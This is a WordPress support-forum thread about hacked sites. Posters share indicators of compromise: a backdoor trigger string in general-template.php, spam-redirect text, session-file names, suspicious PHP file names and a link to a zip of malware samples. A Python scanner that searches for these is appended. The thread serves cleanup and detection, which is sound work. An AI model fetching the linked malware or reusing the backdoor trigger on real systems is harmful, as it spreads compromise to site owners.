Remain calm and carefully follow this guide. When you’re done, you may want to implement some (if not all) of the recommended security measures.
Thanks for the immediate response, Steve.
Also, will you be able to tell me if this code is hacked as well?
From this file, wp-includes/general-template.php:
strpos($_SERVER['REQUEST_URI'], 'gimmeyourfuckingtemplate')
Hi,
*I am new at all of this. I am not a hard-core programmer.
I need some help with preventing PHP code injection on my core files.
Is there any way I can prevent it?
Yes, this code above is part of the hacker's set of exploits.
After ensuring all passwords are changed, and all extra Admin Users are removed or downgraded, you’ll need to search for all .htaccess files within your account. It’s likely there is a .htaccess file above your public_html as well as in many of your directories.
Start by searching through all files on your site for this text:
google|yahoo|msn|aol|bing
And then:
SESS_48cd7517d21176f980daa5502d9efb31
Please read the steps in the links I provided. Your system is compromised and you cannot trust anything on it.
You need to start working your way through these resources:
Additional Resources:
Hi Anjoid
The problem is someone was handling the accounts before I did, so no one told me it was that bad.
What I'm currently doing is running Wordfence twice a day, as well as manually checking my server for code injections.
I have also used what Steve recommended above.
My hosting is GoDaddy.
Thanks
– Ray
I’m still facing the issue as well on my Bluehost server. I personally believe the shared server was affected and is continuing to cause the issue.
Here’s what I’ve done
– Updated and cleaned all .htaccess files and changed permissions to 444
– Updated and cleaned all index.php files and changed permissions 644
– Removed malicious java from header.php and changed permissions 644
– Updated WordPress and all plugins
And after all that the same malicious code came back within hours.
My overall solution was switching to a new host. I decided to go with iPage and I’ve started to move all my sites over. After 48 hours the files on iPage have not been compromised, whereas the exact clean files back on Bluehost were compromised within 1 hour.
Hope that helps! If anyone else has found a solution or has any input please share.
This reply was modified 9 years, 7 months ago by anjoid.
Hi Guys,
I might have deleted something on my server that helped in dealing with the code injection, but the problem is I can't remember which file I removed, because I deleted about 200 suspected files in a day.
But I am still scanning for malware twice a day, to be sure.
@sanchitgupta: I am currently managing 5 sites on GoDaddy, but someone was handling them before me. I would suggest moving servers like Anjoid did, but you will have to create a backup first and scan it with an antivirus, just to be safe, and make sure there is no suspicious code before you upload.
Thanks
The same problem here, with GoDaddy hosting, but I found something encrypted that we can decrypt with unphp.net. Here is one of these files: http://lupsescu.com/malware.zip and just take a look in your /tmp directories; this thing stores lots of SESS_ and sess_ files there. Thanks, and hope we can repair this shit. Scan your web server for these files and folders:
hostdata3.php
post.php
_MACOSX/
meta/
confg.php
context.php
cros.php
onleinw.php
wpcallback.php
This reply was modified 9 years, 6 months ago by lupsescu.
Same problem. Fixed. Thank God.
After tracing the error log and access log, I found and deleted some PHP files which do not belong to my site, in the wp-content/plugins folder, named akismet.php, cron.php, cuckoldry.php, and stonework.php.
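The searches suggested in this thread (the three text strings, the reported file and folder names, and an inventory of every .htaccess file) can be run in one pass. This is an added example, not code from any poster; the `scan` function, its reason labels and the 5 MB read limit are assumptions made for illustration.

```python
import os
import sys

# Strings quoted in this thread as markers of the injected code.
CONTENT_MARKERS = [
    b"gimmeyourfuckingtemplate",
    b"google|yahoo|msn|aol|bing",
    b"SESS_48cd7517d21176f980daa5502d9efb31",
]
# Names posters in this thread reported finding. A name hit is only a lead:
# WordPress core ships a legitimate wp-admin/post.php, for example.
# akismet.php and cron.php are left out as too common as bare names.
SUSPECT_FILES = {
    "hostdata3.php", "post.php", "confg.php", "context.php", "cros.php",
    "onleinw.php", "wpcallback.php", "cuckoldry.php", "stonework.php",
}
SUSPECT_DIRS = {"_MACOSX", "meta"}


def scan(root, max_bytes=5_000_000):
    """Return sorted (relative_path, reason) findings under root.

    Only the first max_bytes of each file are searched.
    """
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        for d in dirnames:
            if d in SUSPECT_DIRS:
                findings.append((os.path.relpath(os.path.join(dirpath, d), root), "name"))
        for name in filenames:
            path = os.path.join(dirpath, name)
            if not os.path.isfile(path):  # skip sockets, FIFOs, broken symlinks
                continue
            rel = os.path.relpath(path, root)
            if name == ".htaccess":  # list every .htaccess for manual review
                findings.append((rel, "htaccess"))
            if name in SUSPECT_FILES:
                findings.append((rel, "name"))
            try:
                with open(path, "rb") as fh:
                    data = fh.read(max_bytes)
            except OSError:
                findings.append((rel, "unreadable"))
                continue
            findings.extend((rel, "content:" + m.decode()) for m in CONTENT_MARKERS if m in data)
    return sorted(findings)


if __name__ == "__main__":
    for rel, reason in scan(sys.argv[1] if len(sys.argv) > 1 else "."):
        print(f"{reason}\t{rel}")
```

Run it against the account root rather than only public_html, since the advice above notes that a .htaccess file may sit above public_html.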